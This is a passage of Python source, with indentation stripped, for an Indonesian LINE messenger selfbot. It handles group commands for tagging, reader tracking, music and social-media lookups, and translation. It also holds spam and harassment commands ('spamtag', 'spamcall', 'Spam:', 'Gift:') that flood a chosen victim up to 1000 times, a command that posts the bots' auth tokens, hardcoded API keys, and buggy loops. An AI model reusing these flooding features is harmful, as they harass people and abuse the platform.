aditmadzs.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot1name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendMessage(msg.to,"Nama diganti jadi " + string + "")
#===========BOT UPDATE============#
elif cmd == "tagall" or text.lower() == '😆':
if wait["selfbot"] == True:
group = aditmadzs.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, jml = [], [], [], [], len(nama)
if jml <= 20:
mentionMembers(msg.to, nama)
if jml > 20 and jml < 40:
for i in range (0, 20):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, len(nama)-1):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
if jml > 40 and jml < 60:
for i in range (0, 20):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 40):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, len(nama)-1):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
if jml > 60 and jml < 80:
for i in range (0, 20):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 40):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 60):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (80, len(nama)-1):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
if jml > 80 and jml < 100:
for i in range (0, 20):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 40):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 60):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, 80):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (80, len(nama)-1):
nm5 += [nama[m]]
mentionMembers(msg.to, nm4)
elif cmd == "listbot":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
for m_id in Bots:
a = a + 1
end = '\n'
ma += str(a) + ". " +aditmadzs.getContact(m_id).displayName + "\n"
aditmadzs.sendMessage(msg.to,"⏩ BOT\n\n"+ma+"\nTotal「%s」BOT" %(str(len(Bots))))
elif cmd == "listadmin":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
a = 0
b = 0
c = 0
for m_id in owner:
a = a + 1
end = '\n'
ma += str(a) + ". " +aditmadzs.getContact(m_id).displayName + "\n"
for m_id in admin:
b = b + 1
end = '\n'
mb += str(b) + ". " +aditmadzs.getContact(m_id).displayName + "\n"
for m_id in staff:
c = c + 1
end = '\n'
mc += str(c) + ". " +aditmadzs.getContact(m_id).displayName + "\n"
aditmadzs.sendMessage(msg.to,"⏩ Admin Aditmadzs BOT\n\n⏩Creator BOT:\n"+ma+"\n⏩Admin:\n"+mb+"\n⏩Staff:\n"+mc+"\n⏩Total「%s」" %(str(len(owner)+len(admin)+len(staff))))
elif cmd == "listprotect":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
md = ""
me = ""
a = 0
b = 0
c = 0
d = 0
e = 0
gid = protectqr
for group in gid:
a = a + 1
end = '\n'
ma += str(a) + ". " +aditmadzs.getGroup(group).name + "\n"
gid = protectkick
for group in gid:
b = b + 1
end = '\n'
mb += str(b) + ". " +aditmadzs.getGroup(group).name + "\n"
gid = protectjoin
for group in gid:
d = d + 1
end = '\n'
md += str(d) + ". " +aditmadzs.getGroup(group).name + "\n"
gid = protectcancel
for group in gid:
c = c + 1
end = '\n'
mc += str(c) + ". " +aditmadzs.getGroup(group).name + "\n"
gid = protectinvite
for group in gid:
e = e + 1
end = '\n'
me += str(e) + ". " +aditmadzs.getGroup(group).name + "\n"
aditmadzs.sendMessage(msg.to,"⏩ BOT Protection\n\n⏩ PROTECT URL :\n"+ma+"\n⏩ PROTECT KICK :\n"+mb+"\n⏩ PROTECT JOIN :\n"+md+"\n⏩ PROTECT CANCEL:\n"+mc+"\n⏩ PROTECT INVITE :\n"+me+"\nTotal「%s」Protect yang aktif" %(str(len(protectqr)+len(protectkick)+len(protectjoin)+len(protectcancel)+len(protectinvite))))
elif cmd == "respon":
if wait["selfbot"] == True:
if msg._from in admin:
ki.sendMessage(msg.to,responsename1)
elif cmd == "assist join":
if wait["selfbot"] == True:
if msg._from in admin:
try:
anggota = [Amid]
aditmadzs.inviteIntoGroup(msg.to, anggota)
ki.acceptGroupInvitation(msg.to)
except:
pass
elif cmd == "join dit":
if wait["selfbot"] == True:
if msg._from in admin:
G = aditmadzs.getGroup(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
G.preventedJoinByTicket = False
aditmadzs.updateGroup(G)
invsend = 0
Ticket = aditmadzs.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = gg.getGroup(msg.to)
G.preventedJoinByTicket = True
ki.updateGroup(G)
elif cmd == "bye":
if wait["selfbot"] == True:
if msg._from in admin:
G = aditmadzs.getGroup(msg.to)
ki.sendMessage(msg.to, "Bye bye group "+str(G.name))
ki.leaveGroup(msg.to)
elif cmd.startswith("leave "):
if msg._from in admin:
proses = text.split(" ")
ng = text.replace(proses[0] + " ","")
gid = aditmadzs.getGroupIdsJoined()
for i in gid:
h = aditmadzs.getGroup(i).name
if h == ng:
ki.sendMessage(i, "Silahkan admin invite atau masukan kembali")
ki.leaveGroup(i)
aditmadzs.sendMessage(to,"Berhasil keluar dari grup " +h)
elif cmd == "assist1":
if msg._from in admin:
G = aditmadzs.getGroup(msg.to)
ginfo = aditmadzs.getGroup(msg.to)
G.preventedJoinByTicket = False
aditmadzs.updateGroup(G)
invsend = 0
Ticket = aditmadzs.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = ki.getGroup(msg.to)
G.preventedJoinByTicket = True
ki.updateGroup(G)
elif cmd == "sprespon":
if wait["selfbot"] == True:
if msg._from in admin:
get_profile_time_start = time.time()
get_profile = aditmadzs.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_group_time_start = time.time()
get_group = aditmadzs.getGroupIdsJoined()
get_group_time = time.time() - get_group_time_start
get_contact_time_start = time.time()
get_contact = aditmadzs.getContact(mid)
get_contact_time = time.time() - get_contact_time_start
aditmadzs.sendMessage(msg.to, " ❧ BOT Speed respon\n\n - Get Profile\n %.10f\n - Get Contact\n %.10f\n - Get Group\n %.10f" % (get_profile_time/3,get_contact_time/3,get_group_time/3))
elif cmd == "speed" or cmd == "sp":
if wait["selfbot"] == True:
if msg._from in admin:
start = time.time()
aditmadzs.sendMessage(msg.to, "Progres speed...")
elapsed_time = time.time() - start
aditmadzs.sendMessage(msg.to, "{} detik".format(str(elapsed_time)))
elif cmd == "lurking on":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
Setmain['ADITMADZSreadPoint'][msg.to] = msg_id
Setmain['ADITMADZSreadMember'][msg.to] = {}
aditmadzs.sendMessage(msg.to, "Lurking berhasil diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "lurking off":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
del Setmain['ADITMADZSreadPoint'][msg.to]
del Setmain['ADITMADZSreadMember'][msg.to]
aditmadzs.sendMessage(msg.to, "Lurking berhasil dinoaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "lurkers":
if msg._from in admin:
if msg.to in Setmain['ADITMADZSreadPoint']:
if Setmain['ADITMADZSreadMember'][msg.to] != {}:
nad = []
for x in Setmain['ADITMADZSreadMember'][msg.to]:
nad.append(x)
try:
arrData = ""
textx = " [ Result {} member ] \n\n [ Lurkers ]\n1. ".format(str(len(nad)))
arr = []
no = 1
b = 1
for i in nad:
b = b + 1
end = "\n"
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
textx += mention
if no < len(nad):
no += 1
textx += str(b) + ". "
else:
try:
no = "[ {} ]".format(str(aditmadzs.getGroup(msg.to).name))
except:
no = " "
msg.to = msg.to
msg.text = textx+"\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]"
msg.contentMetadata = {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}
msg.contentType = 0
aditmadzs.sendMessage1(msg)
except:
pass
try:
del Setmain['ADITMADZSreadPoint'][msg.to]
del Setmain['ADITMADZSreadMember'][msg.to]
except:
pass
Setmain['ADITMADZSreadPoint'][msg.to] = msg.id
Setmain['ADITMADZSreadMember'][msg.to] = {}
else:
aditmadzs.sendMessage(msg.to, "User kosong...")
else:
aditmadzs.sendMessage(msg.to, "Ketik lurking on dulu")
elif cmd == "sider on":
if wait["selfbot"] == True:
if msg._from in admin:
try:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
aditmadzs.sendMessage(msg.to, "Cek sider diaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
except:
pass
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
elif cmd == "sider off":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.to in cctv['point']:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
cctv['cyduk'][msg.to]=False
aditmadzs.sendMessage(msg.to, "Cek sider dinonaktifkan\n\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
else:
aditmadzs.sendMessage(msg.to, "Sudak tidak aktif")
#===========Eğlence============#
elif cmd.startswith("musik: "):
if msg._from in admin:
try:
search = msg.text.replace("musik: ","")
r = requests.get("https://farzain.xyz/api/premium/joox.php?apikey=al11241519&id={}".format(urllib.parse.quote(search)))
data = r.text
data = json.loads(data)
info = data["info"]
audio = data["audio"]
hasil = "「 Hasil Musik 」\n"
hasil += "\nPenyanyi : {}".format(str(info["penyanyi"]))
hasil += "\nJudul : {}".format(str(info["judul"]))
hasil += "\nAlbum : {}".format(str(info["album"]))
hasil += "\n\nLink : \n1. Image : {}".format(str(data["gambar"]))
hasil += "\n\nLink : \n2. MP3 : {}".format(str(audio["mp3"]))
hasil += "\n\nLink : \n3. M4A : {}".format(str(audio["m4a"]))
aditmadzs.sendImageWithURL(msg.to, str(data["gambar"]))
aditmadzs.sendMessage(msg.to, str(hasil))
aditmadzs.sendMessage(msg.to, "Downloading...")
aditmadzs.sendMessage(msg.to, "「 Result MP3 」")
aditmadzs.sendAudioWithURL(msg.to, str(audio["mp3"]))
aditmadzs.sendMessage(msg.to, "「 Result M4A 」")
aditmadzs.sendVideoWithURL(msg.to, str(audio["m4a"]))
aditmadzs.sendMessage(msg.to, str(data["lirik"]))
aditmadzs.sendMessage(msg.to, "Success Download...")
except Exception as error:
aditmadzs.sendMessage(msg.to, "「 Result Error 」\n" + str(error))
elif cmd.startswith("randomnumber: "):
if msg._from in admin:
separate = msg.text.split(" ")
angka = msg.text.replace(separate[0] + " ","")
tgb = angka.split("-")
num1 = tgb[0]
num2 = tgb[1]
r = requests.get("https://farzain.xyz/api/random.php?min="+num1+"&max="+num2)
data = r.json()
aditmadzs.sendMessage(msg.to,"Hasil : "+str(data["url"]))
elif cmd.startswith("1cak"):
if msg._from in admin:
r=requests.get("https://api-1cak.herokuapp.com/random")
data=r.text
data=json.loads(data)
print(data)
hasil = "Result :\n"
hasil += "\nID : " +str(data["id"])
hasil += "\nTitle : " + str(data["title"])
hasil += "\nUrl : " + str(data["url"])
hasil += "\nVotes : " + str(data["votes"])
aditmadzs.sendMessage(msg.to, str(hasil))
elif cmd.startswith("musik2: "):
if msg._from in admin:
try:
dan = msg.text.replace("musik2: ","")
r = requests.get("http://corrykalam.pw/api/joox.php?song={}"+urllib.parse.quote(dan))
data = r.json()
l = data["lyric"].replace("ti:","Judul: ")
i = l.replace("ar:","Penyanyi: ")
r = i.replace("al:","Album: ")
ii = r.replace("[by:]","")
k = ii.replace("[offset:0]","")
lirik = k.replace("***Lirik didapat dari pihak ketiga***\n","")
aditmadzs.sendImageWithURL(msg.to, data["image"])
t = "[ Music ]"
t += "\n\nJudul: "+str(data["title"])
t+="\nPenyanyi: "+str(data["singer"])
t+="\n\n[ Finish ]\n\n"+str(lirik)
aditmadzs.sendMessage(msg.to, str(t))
aditmadzs.sendAudioWithURL(msg.to, data["url"])
except Exception as error:
pass
elif cmd.startswith("playlist "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
query = msg.text.replace(sep[0] + " ","")
cond = query.split(":")
search = str(cond[0])
result = requests.get("http://api.ntcorp.us/joox/search?q={}".format(str(search)))
data = result.text
data = json.loads(data)
if len(cond) == 1:
num = 0
ret_ = "━━━━[ List Lagu ]━━━━"
for music in data["result"]:
num += 1
ret_ += "\n {}. {}".format(str(num), str(music["single"]))
ret_ += "\n ━━[ Total {} Lagu ]━━".format(str(len(data["result"])))
ret_ += "\n\nUntuk Melihat Details Musik, Silahkan Ketik \n❧「 {}Playlist {}:nomor 」 ".format(str(),str(search))
ret_ += "\n❧「 {}Lirik {}:nomor 」 ".format(str(),str(search))
aditmadzs.sendMessage(msg.to, str(ret_))
elif len(cond) == 2:
num = int(cond[1])
if num <= len(data["result"]):
music = data["result"][num - 1]
result = requests.get("http://api.ntcorp.us/joox/song_info?sid={}".format(str(music["sid"])))
data = result.text
data = json.loads(data)
if data["result"] != []:
ret_ = "┏━━━━[ Detail Musik ]━━━━"
ret_ += "\n┃┃ Title : {}".format(str(data["result"]["song"]))
ret_ += "\n┃┃ Album : {}".format(str(data["result"]["album"]))
ret_ += "\n┃┃ Size : {}".format(str(data["result"]["size"]))
ret_ += "\n┗━━[ Tunggu Audionya ]━━━"
aditmadzs.sendMessage(msg.to, str(ret_))
aditmadzs.sendAudioWithURL(msg.to, str(data["result"]["mp3"][0]))
except Exception as error:
pass
elif cmd.startswith("lirik "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
query = msg.text.replace(sep[0] + " ","")
cond = query.split(":")
search = cond[0]
api = requests.get("http://api.secold.com/joox/cari/{}".format(str(search)))
data = api.text
data = json.loads(data)
if len(cond) == 1:
num = 0
ret_ = "━━━━[ List Lirik ]━━━━"
for lyric in data["results"]:
num += 1
ret_ += "\n {}. {}".format(str(num), str(lyric["single"]))
ret_ += "\n ━━[ Total {} Lagu ]━━".format(str(len(data["results"])))
ret_ += "\n\nUntuk Melihat Details Musik, Silahkan Ketik \n❧「 {}Lirik {}:nomor 」".format(str(),str(search))
ret_ += "\n❧「 {}Playlist {}:nomor 」 ".format(str(),str(search))
aditmadzs.sendMessage(msg.to, str(ret_))
elif len(cond) == 2:
num = int(cond[1])
if num <= len(data["results"]):
lyric = data["results"][num - 1]
api = requests.get("http://api.secold.com/joox/sid/{}".format(str(lyric["songid"])))
data = api.text
data = json.loads(data)
lyrics = data["results"]["lyric"]
lyric = lyrics.replace('ti:','Title - ')
lyric = lyric.replace('ar:','Artist - ')
lyric = lyric.replace('al:','Album - ')
removeString = "[1234567890.:]"
for char in removeString:
lyric = lyric.replace(char,'')
aditmadzs.sendMessage(msg.to, str(lyric))
except Exception as error:
pass
elif cmd.startswith("img food: "):
if msg._from in admin:
query = msg.text.replace("img food: ","")
r = requests.get("https://cryptic-ridge-9197.herokuapp.com/api/imagesearch/" + query + "?offset=1")
data=r.text
data=json.loads(r.text)
if data != []:
for food in data:
aditmadzs.sendImageWithURL(msg.to, str(food["url"]))
elif cmd.startswith("profilesmule: "):
if msg._from in admin:
try:
separate = msg.text.split(" ")
smule = msg.text.replace(separate[0] + " ","")
links = ("https://smule.com/"+smule)
ss = ("http://api2.ntcorp.us/screenshot/shot?url={}".format(urllib.parse.quote(links)))
aditmadzs.sendMessage(msg.to, "Sedang Mencari...")
time.sleep(2)
aditmadzs.sendMessage(msg.to, "ID Smule : "+smule+"\nLink : "+links)
aditmadzs.sendImageWithURL(msg.to, ss)
except Exception as error:
pass
elif cmd.startswith("meme"):
if msg._from in admin:
txt = msg.text.split("@")
image = ("http://memegen.link/"+txt[1].replace(" ","_")+"/"+txt[2].replace(" ","_")+"/"+txt[3].replace(" ","_")+".jpg?watermark=none")
aditmadzs.sendImageWithURL(msg.to, image)
elif cmd.startswith("ytmp4: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
best = vid.getbest()
best.resolution, best.extension
for s in stream:
me = best.url
hasil = ""
title = "Judul [ " + vid.title + " ]"
author = '\n\n❧ Author : ' + str(vid.author)
durasi = '\n❧ Duration : ' + str(vid.duration)
suka = '\n❧ Likes : ' + str(vid.likes)
rating = '\n❧ Rating : ' + str(vid.rating)
deskripsi = '\n❧ Deskripsi : ' + str(vid.description)
aditmadzs.sendVideoWithURL(msg.to, me)
aditmadzs.sendMessage(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
aditmadzs.sendMessage(msg.to,str(e))
elif cmd.startswith("ytmp3: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
textToSearch = msg.text.replace(sep[0] + " ","")
query = urllib.parse.quote(textToSearch)
search_url="https://www.youtube.com/results?search_query="
mozhdr = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3'}
sb_url = search_url + query
sb_get = requests.get(sb_url, headers = mozhdr)
soupeddata = BeautifulSoup(sb_get.content, "html.parser")
yt_links = soupeddata.find_all("a", class_ = "yt-uix-tile-link")
x = (yt_links[1])
yt_href = x.get("href")
yt_href = yt_href.replace("watch?v=", "")
qx = "https://youtu.be" + str(yt_href)
vid = pafy.new(qx)
stream = vid.streams
bestaudio = vid.getbestaudio()
bestaudio.bitrate
best = vid.getbest()
best.resolution, best.extension
for s in stream:
shi = bestaudio.url
me = best.url
vin = s.url
hasil = ""
title = "Judul [ " + vid.title + " ]"
author = '\n\n❧ Author : ' + str(vid.author)
durasi = '\n❧ Duration : ' + str(vid.duration)
suka = '\n❧ Likes : ' + str(vid.likes)
rating = '\n❧ Rating : ' + str(vid.rating)
deskripsi = '\n❧ Deskripsi : ' + str(vid.description)
aditmadzs.sendImageWithURL(msg.to, me)
aditmadzs.sendAudioWithURL(msg.to, shi)
aditmadzs.sendMessage(msg.to,title+ author+ durasi+ suka+ rating+ deskripsi)
except Exception as e:
aditmadzs.sendMessage(msg.to,str(e))
elif cmd.startswith("profileig: "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
instagram = msg.text.replace(sep[0] + " ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html.parser')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
AR = text1[0].replace("s150x150/","")
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "========INSTAGRAM INFO ========\n"
details = "\n========INSTAGRAM INFO ========"
aditmadzs.sendMessage(msg.to, detail + user + user1 + followers + following + post + link + details)
aditmadzs.sendImageWithURL(msg.to, AR)
except Exception as njer:
aditmadzs.sendMessage(msg.to, str(njer))
elif cmd.startswith("cekig:"):
if msg._from in admin:
try:
sep = text.split(" ")
search = text.replace(sep[0] + " ","")
r = requests.get("https://farzain.xyz/api/ig_profile.php?apikey=arTdnVbJkW1EuzDNQrIxQDvHARIDcQ&id={}".format(search))
data = r.text
data = json.loads(data)
if data != []:
ret_ = "┏━━[ Profile Instagram ]"
ret_ += "\n┃┃ Nama : {}".format(str(data["info"]["full_name"]))
ret_ += "\n┃┃ Username : {}".format(str(data["info"]["username"]))
ret_ += "\n┃┃ Bio : {}".format(str(data["info"]["bio"]))
ret_ += "\n┃┃ URL Bio : {}".format(str(data["info"]["url_bio"]))
ret_ += "\n┃┃ Pengikut : {}".format(str(data["count"]["followers"]))
ret_ += "\n┃┃ Diikuti : {}".format(str(data["count"]["followers"]))
ret_ += "\n┃┃ Total Post : {}".format(str(data["count"]["post"]))
ret_ += "\n┗━━[ https://www.instagram.com/{} ]".format(search)
path = data["info"]["profile_pict"]
aditmadzs.sendMessage(to, str(ret_))
aditmadzs.sendImageWithURL(to, str(path))
except Exception as e:
aditmadzs.sendMessage(msg.to, str(e))
elif cmd.startswith("cekdate: "):
if msg._from in admin:
sep = msg.text.split(" ")
tanggal = msg.text.replace(sep[0] + " ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91ARs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
aditmadzs.sendMessage(msg.to,"🐚 I N F O R M A S I 🐚\n\n"+"🐚 Date Of Birth : "+lahir+"\n🐚 Age : "+usia+"\n🐚 Ultah : "+ultah+"\n🐚 Zodiak : "+zodiak)
elif cmd.startswith("spamtag: "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
Setmain["ADITMADZSlimit"] = num
aditmadzs.sendMessage(msg.to,"Total Spamtag Diubah Menjadi " +strnum)
elif cmd.startswith("spamcall: "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
wait["limit"] = num
aditmadzs.sendMessage(msg.to,"Total Spamcall Diubah Menjadi " +strnum)
elif cmd.startswith("spamtag "):
if wait["selfbot"] == True:
if msg._from in admin:
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
zx = ""
zxc = " "
zx2 = []
pesan2 = "@a"" "
xlen = str(len(zxc))
xlen2 = str(len(zxc)+len(pesan2)-1)
zx = {'S':xlen, 'E':xlen2, 'M':key1}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
msg.text = zxc
lol = {'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
msg.contentMetadata = lol
jmlh = int(Setmain["ADITMADZSlimit"])
if jmlh <= 1000:
for x in range(jmlh):
try:
aditmadzs.sendMessage1(msg)
except Exception as e:
aditmadzs.sendMessage(msg.to,str(e))
else:
aditmadzs.sendMessage(msg.to,"Jumlah melebihi 1000")
elif cmd == "spamcall":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
group = aditmadzs.getGroup(to)
members = [mem.mid for mem in group.members]
jmlh = int(wait["limit"])
aditmadzs.sendMessage(msg.to, "Berhasil mengundang {} undangan Call Grup".format(str(wait["limit"])))
if jmlh <= 1000:
for x in range(jmlh):
try:
call.acquireGroupCallRoute(to)
call.inviteIntoGroupCall(to, contactIds=members)
except Exception as e:
aditmadzs.sendMessage(msg.to,str(e))
else:
aditmadzs.sendMessage(msg.to,"Jumlah melebihi batas")
elif 'Gift: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
korban = msg.text.replace('Gift: ','')
korban2 = korban.split()
midd = korban2[0]
jumlah = int(korban2[1])
if jumlah <= 1000:
for var in range(0,jumlah):
aditmadzs.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '5'}, contentType=9)
ki.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
elif 'Spam: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
korban = msg.text.replace('Spam: ','')
korban2 = korban.split()
midd = korban2[0]
jumlah = int(korban2[1])
if jumlah <= 1000:
for var in range(0,jumlah):
aditmadzs.sendMessage(midd, str(Setmain["ADITMADZSmessage1"]))
ki.sendMessage(midd, str(Setmain["ADITMADZSmessage1"]))
elif 'Mybottoken' in msg.text:
if wait["selfbot"] == True:
if msg._from in creator:
aditmadzs.sendMessage(msg.to,"Aditmadzs\n"+aditmadzs.authToken)
aditmadzs.sendMessage(msg.to,"KI\n"+ki.authToken)
#==============================================================================#
elif msg.text.lower().startswith("tr-af "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='af')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-sq "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='sq')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-am "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='am')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ar "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ar')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-hy "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='hy')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-az "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='az')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-eu "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='eu')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-be "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='be')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-bn "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='bn')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-bs "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='bs')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-bg "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='bg')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ca "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ca')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ceb "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ceb')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-ny "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='ny')
A = hasil.text
aditmadzs.sendMessage(msg.to, A)
elif msg.text.lower().startswith("tr-zh-cn "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
isi = text.replace(sep[0] + " ","")
translator = Translator()
hasil = translator.translate(isi, dest='zh-cn')
A = hasil.text
